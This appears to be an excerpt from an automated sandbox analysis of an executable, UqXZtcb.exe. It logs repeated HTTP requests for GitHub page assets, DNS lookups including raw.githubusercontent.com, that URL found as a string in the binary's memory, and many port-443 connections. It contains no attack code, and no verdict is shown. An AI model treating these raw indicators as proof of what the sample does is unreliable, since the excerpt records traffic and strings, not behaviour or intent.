Source: global traffic	HTTP traffic detected: GET /assets/shape-0-df97fa6b0c27.svg HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/illu-copilot-editor-6474457a5b19.png HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/shape-1-c219318e479a.svg HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/git-branch-productivity-c304b83d09c7.svg HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/illu-copilot-sidebar-3d2efb504577.png HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/bg-glow-purple-6e9a6a96cb04.png HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/illu-actions-2-c5178134f381.png HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/illu-codespaces-1d2d17e8b2b7.png HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/illu-mobile-chat-9e7549906574.webp HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/shape-2-f30dcc9bd35c.svg HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/git-branch-security-2-f6a799957581.svg HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/illu-ghas-list-84af1f1ce2b8.png HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/bg-glow-blue-036b8dc2d1ce.png HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/illu-dependabot-d98c73cc6724.png HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/illu-code-scanning-fc9dfb212aa3.png HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/shape-3-9e542b5c31b8.svg HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/illu-secret-scanning-2-88fb429376d6.png HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/git-branch-collaboration-2-e46b1fb1d363.svg HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/issues-plan-2-46d1ce1d4519.png HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/illu-projects-2-26077f1dd188.png HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/illu-discussions-2-b915a6dd867e.png HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/illu-pull-requests-2-280cc958fc05.png HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/directus-4da9e46da0ac.png HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/commandpost-18d45fffda67.png HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/chaynhq-4c5953025dca.png HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/imolorhe-9d771b1d4332.jpeg HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/dayhaysoos-c50659cac73b.jpeg HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/yyx990803-e11c7b140b17.jpeg HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/eslint-33bd6140c37f.png HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/sindresorhus-d3224f241a4d.jpeg HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/homebrew-c7e38eeacb52.png HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/globe-d6f3f4ee645a.jpg HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/footer-copilot-54114bfd1d20.png HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/footer-mona-d1c861cd8018.png HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/footer-star-36e5b5724973.png HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/footer-diamond-ed642fc95144.png HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/footer-orb-a0438104a7a2.png HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /assets/footer-blur-8bc8e1f23df6.png HTTP/1.1Accept: /Accept-Language: en-CHUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: github.githubassets.comConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: time.windows.com
Source: global traffic	DNS traffic detected: DNS query: raw.githubusercontent.com
Source: global traffic	DNS traffic detected: DNS query: github.com
Source: global traffic	DNS traffic detected: DNS query: github.githubassets.com

Source: UqXZtcb.exe, 00000029.00000002.1405348535.00007FF7BBF71000.00000040.00000001.01000000.00000029.sdmp

String found in binary or memory: https://raw.githubusercontent.com/

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown	Network traffic detected: HTTP traffic on port 49789 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49800 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49766 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49795 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49738
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49737
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49735
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49772 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49812 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49784 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49749 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49823 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49727
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49725
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49723
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49722
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49748 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49828 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49805 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49822 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49796 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49829
Source: unknown	Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49828
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49827
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49826
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49704
Source: unknown	Network traffic detected: HTTP traffic on port 49754 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49825
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49824
Source: unknown	Network traffic detected: HTTP traffic on port 49737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49823
Source: unknown	Network traffic detected: HTTP traffic on port 49771 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49822
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49788
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49787
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49786
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49785
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49784
Source: unknown	Network traffic detected: HTTP traffic on port 49813 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49781
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49780
Source: unknown	Network traffic detected: HTTP traffic on port 49785 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49807 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49776 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49791 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49759 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49753 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49779
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49776
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49775
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49774
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49772
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49771
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49770
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49742 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49780 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49802 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49769
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49768
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49767
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49766
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 49758 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49764
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49762
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49761
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49764 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49770 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49801 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49824 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49759
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49758
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49757
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49756
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49755
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49754
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49753
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49752
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49751
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49750
Source: unknown	Network traffic detected: HTTP traffic on port 49818 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49786 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49829 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49775 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49749
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49748
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown	Network traffic detected: HTTP traffic on port 49792 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49746
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49745
Source: unknown	Network traffic detected: HTTP traffic on port 49746 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49781 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49769 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49803 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49826 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49820 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49752 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49798 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49735 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49819 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49787 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49793 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49751 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49774 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49757 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49799
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49798
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49796
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49795
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49794
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49793
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49792
Source: unknown	Network traffic detected: HTTP traffic on port 49814 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49791
Source: unknown	Network traffic detected: HTTP traffic on port 49740 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49768 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49825 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49808 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49789
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49821
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49820
Source: unknown	Network traffic detected: HTTP traffic on port 49779 -> 443
